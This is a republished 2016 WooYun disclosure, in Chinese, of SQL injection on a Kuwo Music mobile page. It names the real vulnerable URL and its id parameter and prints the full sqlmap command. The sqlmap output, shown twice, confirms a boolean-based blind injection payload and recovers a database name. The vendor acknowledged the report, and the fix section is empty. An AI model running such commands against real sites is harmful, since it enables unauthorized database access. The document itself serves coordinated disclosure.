酷我音乐某站存在SQL注入

admin 2017年3月26日05:07:50评论587 views字数 198阅读0分39秒阅读模式
摘要

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

漏洞概要 关注数(0) 关注此漏洞

缺陷编号: WooYun-2016-187100

漏洞标题: 酷我音乐某站存在SQL注入

相关厂商: 酷我音乐

漏洞作者: firexp

提交时间: 2016-03-21 07:40

公开时间: 2016-05-05 09:35

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏


漏洞详情

披露状态:

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

简要描述:

注入

详细说明:

code 区域
http://mobile.kuwo.cn/mpage/special/showSpecalShare.jsp?id=1874

D:/Tools/sqlmap-1.0>python sqlmap.py -c sqlmap.conf -u "http://mobile.kuwo.cn/mpage/special/showSpecalShare.jsp?id=1874" --time-sec=5 --level 3 --dbs --hex

_

___ ___| |_____ ___ ___ {1.0-stable}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:16:58

[20:16:58] [INFO] fetched random HTTP User-Agent header from file 'D:/Tools/sqlmap-1.0/txt/user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1'

[20:16:58] [INFO] resuming back-end DBMS 'mysql'

[20:16:58] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1874 AND 6307=6307

---

[20:16:58] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5

[20:16:58] [INFO] fetching database names

[20:16:58] [INFO] fetching number of databases

[20:16:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[20:16:58] [INFO] retrieved:

[20:16:58] [WARNING] reflective value(s) found and filtering out

[20:17:23] [INFO] retrieved:

[20:17:23] [ERROR] unable to retrieve the number of databases

[20:17:23] [INFO] falling back to current database

[20:17:23] [INFO] fetching current database

[20:17:23] [INFO] retrieved: 454449544F5

[20:18:25] [WARNING] turning off pre-connect mechanism because of connection time out(s)

[20:18:25] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)

[20:18:26] [INFO] retrieved: EDITOR

available databases [1]:

[*] EDITOR

[20:18:26] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 3 times, 503 (Service Unavailable) - 1 times

漏洞证明:

code 区域
http://mobile.kuwo.cn/mpage/special/showSpecalShare.jsp?id=1874

D:/Tools/sqlmap-1.0>python sqlmap.py -c sqlmap.conf -u "http://mobile.kuwo.cn/mpage/special/showSpecalShare.jsp?id=1874" --time-sec=5 --level 3 --dbs --hex

_

___ ___| |_____ ___ ___ {1.0-stable}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:16:58

[20:16:58] [INFO] fetched random HTTP User-Agent header from file 'D:/Tools/sqlmap-1.0/txt/user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1'

[20:16:58] [INFO] resuming back-end DBMS 'mysql'

[20:16:58] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1874 AND 6307=6307

---

[20:16:58] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5

[20:16:58] [INFO] fetching database names

[20:16:58] [INFO] fetching number of databases

[20:16:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[20:16:58] [INFO] retrieved:

[20:16:58] [WARNING] reflective value(s) found and filtering out

[20:17:23] [INFO] retrieved:

[20:17:23] [ERROR] unable to retrieve the number of databases

[20:17:23] [INFO] falling back to current database

[20:17:23] [INFO] fetching current database

[20:17:23] [INFO] retrieved: 454449544F5

[20:18:25] [WARNING] turning off pre-connect mechanism because of connection time out(s)

[20:18:25] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)

[20:18:26] [INFO] retrieved: EDITOR

available databases [1]:

[*] EDITOR

[20:18:26] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 3 times, 503 (Service Unavailable) - 1 times

修复方案:

你们懂

版权声明:转载请注明来源 firexp@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-03-21 09:35

厂商回复:

感谢对酷我的支持,我们将进行修复!

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin